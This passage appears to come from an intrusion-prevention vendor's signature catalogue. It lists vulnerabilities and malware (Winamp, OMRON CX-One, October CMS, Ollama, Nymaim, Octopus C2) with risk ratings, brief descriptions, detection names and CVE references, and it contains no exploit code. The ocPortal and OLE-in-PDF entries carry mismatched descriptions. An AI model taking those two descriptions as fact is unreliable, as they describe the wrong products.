OSVDB-76635
http://www.osvdb.org/76635
Back to top

Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in NullSoft WinAmp
Risk: High
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: There is a vulnerability in Nullsoft Winamp. The vulnerability is caused by improper handling of the header of Audio Interchange File Format (AIFF) media files. A remote attacker can exploit this vulnerability by enticing the user to open a crafted AIFF file, thereby creating a denial of service condition or potentially injecting and executing arbitrary code on the target system.
Situation: HTTP_SS-Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
File-Binary_Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
References:
BID-33226
http://www.securityfocus.com/bid/33226
Back to top

Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow

About this vulnerability: A vulnerability in NullSoft WinAmp
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Winamp. The vulnerability is due to an integer overflow when a stream count from an AVI file is used in a buffer size calculation. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to open a crafted AVI file. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user.
Situation: File-RIFF_Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow
References:
CVE-2011-3834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3834
OSVDB-77636
http://www.osvdb.org/77636
Back to top

Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow

About this vulnerability: A vulnerability in NullSoft WinAmp
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Winamp
Type: Integer Overflow
Description: A vulnerability exists in the CAF (Core Audio Format) file parsing component of Nullsoft Winamp.
Situation: HTTP_SS-Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
File-Binary_Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
References:
CVE-2009-0186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0186
BID-33963
http://www.securityfocus.com/bid/33963
Back to top

Nullsoft-Winamp-MIDI-File-Buffer-Overflow

About this vulnerability: A vulnerability in NullSoft WinAmp
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Winamp
Type: Buffer Overflow
Description: There exists a code execution vulnerability in Nullsoft Winamp. A remote attacker can use this to execute arbitrary code in the security context of the logged-in user.
Situation: File-Binary_Nullsoft-Winamp-MIDI-File-Buffer-Overflow
References:
OSVDB-76634
http://www.osvdb.org/76634
Back to top

Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Nullsoft Winamp
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Winamp
Type: Malfunction
Description: There is a vulnerability in the MIDI file parsing component of Nullsoft Winamp. The vulnerability is caused by the improper handling of the header of a MIDI media file. A remote attacker can exploit this vulnerability by enticing the user to open a crafted MIDI file, thereby creating a denial of service condition or potentially injecting and executing arbitrary code on the target system. Upon an unsuccessful attack attempting to leverage this vulnerability, the Winamp player will terminate. In an attack scenario where arbitrary code is injected and executed on the target machine, the behaviour of the target host is dependent on the intention of the malicious code. Any code injected into the vulnerable program would execute in the security context of the currently logged in user.
Situation: File-Binary_Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow
References:
CVE-2006-3228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3228
BID-18507
http://www.securityfocus.com/bid/18507
Back to top

Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in NullSoft WinAmp
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: There is a code execution vulnerability in Nullsoft Winamp. The vulnerability is due to a boundary error while handling timestamps in MIDI files. Remote attackers can exploit this vulnerability by enticing the target user to open a specially crafted MIDI file. Successful exploitation leads to to arbitrary code execution in the security context of the logged-in user.
Situation: HTTP_SS-Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
File-Binary_Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
Back to top

Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Nullsoft Winamp
Risk: Moderate
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Malfunction
Description: There is a memory corruption vulnerability in Nullsoft Winamp. The vulnerability is due to improper handling of certain exceptional conditions that could occur while processing crafted MP4 files. Remote attackers can exploit this vulnerability by enticing target users to open a crafted MP4 file that causes memory corruption. Successful exploitation may lead to arbitrary code execution in the security context of the currently logged in user.
Situation: HTTP_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
File-MPEG_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
References:
CVE-2007-2498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2498
BID-23723
http://www.securityfocus.com/bid/23723
Back to top

Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Nullsoft Winamp
Risk: High
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Nullsoft Winamp Player. The vulnerability is due to boundary errors when parsing metadata in Ultravox streaming protocol. An attacker may exploit the vulnerability by enticing a user to visit a malicious server with the affected product, resulting in execution of arbitrary code on the target host within the security context of the currently logged in user.
Situation: HTTP_SS-Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF
File-Binary_Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF
References:
CVE-2008-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0065
BID-27344
http://www.securityfocus.com/bid/27344
Back to top

Nuuo-CMS-Arbitrary-File-Download

About this vulnerability: A vulnerability in Nuuo CMS
Risk: High
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nuuo CMS
Type: Directory Traversal
Description: A vulnerability in Nuuo CMS, versions below and including 3.5, which allows remote attackers to execute arbitrary code or obtain restricted information due to the application allowing input to construct a pathname that is outside of the intended directory.
Situation: Generic_CS-Nuuo-CMS-Arbitrary-File-Download
References:
CVE-2018-17934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17934
Back to top

Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution

About this vulnerability: A vulnerability in NUUO NVRmini devices
Risk: High
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NUUO NVRmini
Type: Input Validation
Description: A vulnerability in NUUO NVRmini devices which allows remote attackers to execute arbitrary code due to insufficient input validation of the uploaddir parameter for a writeuploaddir command to upgrade_handle.php.
Situation: HTTP_CRL-Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution
References:
CVE-2018-14933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14933
Back to top

Nuxeo-Nuxeounknownresource-Expression-Language-Injection

About this vulnerability: A vulnerability in Nuxeo Nuxeo
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nuxeo
Type: Input Validation
Description: Insufficient validation of user supplied HTTP URIs causes an expression language injection vulnerability in the Nuxeo CMS. A successful exploit allow an attacker to run code with the privlieges of the Nuxeo user.
Situation: HTTP_CRL-Nuxeo-Nuxeounknownresource-Expression-Language-Injection
References:
CVE-2018-16341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16341
Back to top

Nymaim-Botnet

About this vulnerability: Nymaim botnet
Risk: High
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Nymaim is a malicious botnet which poses a serious threat to Internet users. Most notably, Nymaim engages in trojan activity as an information stealer and web proxy. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation: File-Text_Shiotop-Botnet-Traffic
File-Text_Nymaim-Botnet-Traffic
Back to top

Object-Classid-In-Nonstandard-Format

About this vulnerability: A nonstandard format of the class id of an object was detected
Risk: Moderate
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Format String
Description: A nonstandard format of the class id of an object was detected
Situation: File-Text_Object-Classid-In-Nonstandard-Format
File-Text_Classid-Obfuscated-Reference
Back to top

ocPortal-Arbitrary-File-Inclusion

About this vulnerability: ocPortal Arbitrary File Inclusion
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: ocPortal
Type: Input Validation
Description: There exists a vulnerability in Cisco Collaboration Server that allows an unauthorized user to upload files and gain administrative privileges.
Situation: HTTP_CRL-ocPortal-Arbitrary-File-Inclusion-Vulnerability
Back to top

OCS-Inventory-NG-Commandline.php-Command-Injection

About this vulnerability: A vulnerability in OCS Inventory
Risk: Moderate
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OCS Inventory
Type: Input Validation
Description: There exists a command injection vulnerability in OCS Inventory. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-OCS-Inventory-NG-Commandline.php-Command-Injection
References:
CVE-2020-14947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14947
Back to top

October-CMS-Remote-Code-Execution

About this vulnerability: A vulnerability in October CMS
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: October CMS
Type: Input Validation
Description: A vulnerability in October CMS, version v1.0.412, which allows remote attackers to execute arbitrary code in the file upload functionality.
Situation: HTTP_CS-Php-POST-File-Upload-Buffer-Overflow
References:
CVE-2017-1000119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000119
Back to top

October-CMS-Unauthorized-Password-Change-CVE-2021-32648

About this vulnerability: An attempt to exploit a vulnerability in October CMS detected
Risk: High
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: October CMS
Type: Type Confusion
Description: An authentication bypass vulnerability has been reported in October CMS. A remote attacker can use this vulnerability to reset any October CMS user passwords via a crafted HTTP POST request.
Situation: File-Text_October-CMS-Unauthorized-Password-Change-CVE-2021-32648
References:
CVE-2021-32648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32648
Back to top

Octopus-C2-Infection-Traffic

About this vulnerability: Octopus C2 framework infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Octopus C2 framework infection traffic was detected.
Situation: HTTP_SLS-Octopus-C2-Infection-Traffic
File-Text_Octopus-C2-Initial-Infection-Traffic
Back to top

Octoshape-P2P-Plugin-Usage

About this vulnerability: Octoshape P2P plugin usage
Risk: Moderate
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Octoshape
Type: Peer-to-Peer
Description: Octoshape is a peer-to-peer media streaming platform that can be used by media providers to improve quality of service for their users. Octoshape comes as an automatically installed Flash plugin and can generate a lot of incoming and outgoing traffic that might be unwanted.
Situation: HTTP_CSH-Octoshape-P2P-Plugin
Back to top

Office-BMP-Integer-Overflow-CVE-2009-2518

About this vulnerability: An integer overflow vulnerability in Microsoft Office XP
Risk: High
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP
Type: Malfunction
Description: There is an integer overflow vulnerability in Microsoft Office XP. A successful attack may lead to non-privileged arbitrary code execution.
Situation: E-Mail_BS-Malicious-BMP-File-CVE-2009-2518
HTTP_SS-Malicious-BMP-File-CVE-2009-2518
HTTP_SS-Office-BMP-Integer-Overflow-CVE-2009-2518
File-OLE_Office-BMP-Integer-Overflow-CVE-2009-2518
File-Binary_Malicious-BMP-File-CVE-2009-2518
References:
CVE-2009-2518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2518
MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062
Back to top

Office-Macro-Document

About this vulnerability: An Office document with macros detected
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: This situation detects Office documents that contain macros.
Situation: File-OLE_Office-Macro-Document
Back to top

Office-XML-Macro-Document

About this vulnerability: An Office XML document with macros detected
Risk: Moderate
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: This situation detects Office XML documents that contain macros.
Situation: File-TextId_Office-XML-Macro-Document
Back to top

Oficla-Malware

About this vulnerability: Oficla malware
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Oficla is a Windows malware.
Situation: HTTP_CSH-Oficla-Traffic
HTTP_CRL-Oficla-Traffic
Back to top

OLE-File-In-Text-File

About this vulnerability: An OLE file found in a text file
Risk: Moderate
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Misconfiguration
Description: An OLE file was detected inside a text file
Situation: File-Text_OLE-File-In-Text-File
Back to top

OLE-Header-In-PDF-File

About this vulnerability: An OLE file header detected in a PDF file
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: A vulnerability in Microsoft Excel
Situation: File-PDF_OLE-Header-In-PDF-File
Back to top

Oleaut32.dll-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_SS-Oleaut32.dll-Remote-Code-Execution-Vulnerability
File-Text_Oleaut32.dll-Remote-Code-Execution-Vulnerability
References:
CVE-2011-1995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1995
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Ollama-Getblobspath-Digest-Directory-Traversal

About this vulnerability: A vulnerability in Ollama Ollama
Risk: High
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Platform: Generic
Software: Ollama
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Ollama. The vulnerability is due to improper validation of user data in the digest value when pulling a model. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation, in the worst case, could result in an attacker executing arbitrary code on the target server.
Situation: File-Text_Ollama-Getblobspath-Digest-Directory-Traversal
References:
CVE-2024-37032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37032
Back to top

OMI-Agent-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in Azure OMI Agent detected
Risk: High
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1388-5242
Platform: Linux
Software: Open Management Infrastructure
Type: Malfunction
Description: An attempt to exploit a vulnerability in Azure OMI Agent detected. This situation also covers exploiting of the vulnerability CVE-2021-38648.
Situation: HTTP_CRL-OMI-Agent-Unauthenticated-RCE
References:
CVE-2021-38647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38647
Back to top

Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: There has been reported a heap-based overflow in OMRON CX-One CX-FLnet module. The value of parameter "Node Name" is insufficiently validated. Exploiting this vulnerability could lead in arbitrary code execution.
Situation: File-Text_Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow
References:
CVE-2018-8834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8834
Back to top

Omron-CX-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Buffer Overflow
Description: Improper input validation when processing the Type parameter of the FLN configuration file causes a heap-based buffer overflow vulnerability in Omron CX-One. A successful exploit may allow an attacker to execute code on the target system.
Situation: File-Text_Omron-Cx-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow
References:
CVE-2018-8834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8834
Back to top

Omron-Cx-One-Cx-flnet-Version-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: Improper input validation when processing the version parameter of the FLN configuration file causes a heap buffer overflow vulnerability in Omron CX-One. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Text_Omron-Cx-One-Cx-flnet-Version-Heap-Buffer-Overflow
References:
CVE-2018-8834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8834
Back to top

Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: An input validation error when processing the Medi parameter of the MCI configuration file causes a stack-based buffer overflow vulnerability in Omron CX One. A successful exploit may allow an attacker to run arbitrary code on the target system.
Situation: File-Text_Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow
References:
CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514
Back to top

Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Buffer Overflow
Description: Improper processing of the PLCn and PLCt parameters of the MCI configuration file causes a stack-based buffer overflow vulnerability in Omron CX-One. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Text_Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow
References:
CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514
Back to top

Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One CX-Programmer
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: An input validation error when processing #B_PLC_NAME and #B_PLC parameters of the NCI project file causes a stack-based buffer overflow in Omron CX-One. A successful exploit allows an attacker to execute arbitrary code on the target with the privileges of the target user.
Situation: File-Text_Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow
References:
CVE-2018-18993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18993
Back to top

Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: A stack-based overflow exists in the CX-Position module of OMRON CX-One. The vulnerability is due to input validation error when processing NCI configuration files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted NCI file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-Text_Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow
References:
CVE-2020-27261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27261
Back to top

Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One CX-Programmer
Risk: Moderate
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: There has been reported a stack-based overflow in OMRON CX-One CX-Programmer module. Opening a maliciously crafted configuration file is needed to exploit this vulnerability. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow
References:
CVE-2018-18993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18993
Back to top

Omron-Cx-One-Cx-programmer-Program-Use-After-Free

About this vulnerability: A vulnerability in OMRON CX-One CX-Programmer
Risk: High
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Input Validation
Description: A vulnerability in OMRON CX-One CX-Programmer module which allows remote attackers to execute arbitrary code by enticing a target user into opening a maliciously crafted project, due to an input validation error.
Situation: File-Text_Omron-Cx-One-Cx-programmer-Program-Use-After-Free
References:
CVE-2019-6556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6556
Back to top

Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion

About this vulnerability: A vulnerability in OMRON CX-One CX-Protocol
Risk: Moderate
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Malfunction
Description: There has been reported a type confusion vulnerability in OMRON CX-One CX-Protocol. This vulnerability could be exploited by opening a maliciously crafted project file. Successful exploitation can lead in arbitrary code execution.
Situation: File-Binary_Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion
References:
CVE-2018-19027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19027
Back to top

Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion

About this vulnerability: A vulnerability in OMRON CX-One CX-Protocol
Risk: Moderate
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Malfunction
Description: There has been reported a type confusion vulnerability in OMRON CX-One CX-Protocol. Opening a maliciously crafted project file is required to exploit this vulnerability. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion
References:
CVE-2018-19027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19027
Back to top

Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion

About this vulnerability: A vulnerability in OMRON CX-One CX-Protocol
Risk: Moderate
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Malfunction
Description: Improper parsing of a project file by Omron CX One causes a type confusion vulnerability which can be exploited to run arbitrary code on the target system with the privilieges of the exploited process.
Situation: File-Binary_Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion
References:
CVE-2018-19027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19027
Back to top

Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: OMRON CX-One
Type: Buffer Overflow
Description: Improper validation of the TargetPLS parameted in a configuration file causes a stack-based overflow exists in OMRON CX-One CX-FLnet module. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow
References:
CVE-2022-21137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21137
Back to top

Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Buffer Overflow
Description: Improper processing of the TargetPLC parameter of the FLN configuration file causes a stack-based buffer overflow vulnerability in OMRON CX-One. A successful exploit may allow an attacker to run arbitrary code on the target system.
Situation: File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow
References:
CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514
Back to top

Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OMRON CX-One
Risk: Moderate
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OMRON CX-One
Type: Buffer Overflow
Description: There has been reported a stack-based buffer overflow in OMRON CX-One SwitchBox Utility module. The target user needs to open a maliciously crafted SBA configuration file to get exploited by this vulnerability. Successful exploitation could result in arbitrary code execution.
Situation: File-Binary_Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow
References:
CVE-2018-7514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7514
Back to top

OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization

About this vulnerability: A vulnerability in OneDev Platform
Risk: Moderate
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: OneDev Platform
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in OneDev Platform. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSH-OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization
References:
CVE-2021-21242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21242
Back to top

OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246

About this vulnerability: An attempt to exploit a vulnerability in OneDev Platform detected
Risk: High
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: OneDev Platform
Type: Input Validation
Description: OneDev is an all-in-one devops platform. In OneDev before version 4.0.3, there are no security checks enforced for the "/users/{id}" endpoint, so it is possible to retrieve arbitrary user details, including their access tokens. This issue was addressed in 4.0.3 by removing user info from API.
Situation: File-Text_OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
HTTP_CSH-OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
References:
CVE-2021-21246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21246
Back to top

OP5-license.php-Remote-Command-Execution

About this vulnerability: An OP5 license.php Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: OP5
Type: Input Validation
Description: A vulnerability in op5 Monitor, versions before 1.6.2, and op5 Appliance, versions before 5.5.3, in license.php which allows remote attackers to execute arbitrary commands via shell metacharacters in the timestamp parameter for an install action.
Situation: HTTP_CRL-OP5-license.php-Remote-Command-Execution
References:
CVE-2012-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0261
OSVDB-78064
http://www.osvdb.org/78064
Back to top

OP5-Monitor-Command-Test-Command-Injection

About this vulnerability: A vulnerability in op5 Monitor
Risk: Moderate
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OP5
Type: Input Validation
Description: A vulnerability in OP5 Monitor
Situation: HTTP_CSU-OP5-Monitor-Command-Test-Command-Injection
Back to top

OP5-Welcome-Remote-Command-Execution

About this vulnerability: An OP5 Welcome Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: OP5
Type: Input Validation
Description: A vulnerability in op5 Monitor, versions before 2.0.3, and op5 Appliance, versions before 5.5.3, in op5config/welcome which allows remote attackers to execute arbitrary commands via shell metacharacters in the password parameter.
Situation: HTTP_CRL-OP5-Welcome Remote-Command-Execution
References:
CVE-2012-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0262
OSVDB-78065
http://www.osvdb.org/78065
Back to top

OPC-Systems-Denial-of-Service

About this vulnerability: OPCSystems.net version 4.00.0048 and older denial of service
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: OPC Systems
Type: Malfunction
Description: A vulnerability in OPCSystemsService.exe that allows an attacker to hang the service by sending a specially crafted tcp packet.
Situation: Generic_CS-OPC-Systems-Denial-of-Service
Back to top

Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection

About this vulnerability: A vulnerability in Open-Falcon Falcon-Plus
Risk: Moderate
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Generic
Software: Open-Falcon Falcon-Plus
Type: Input Validation
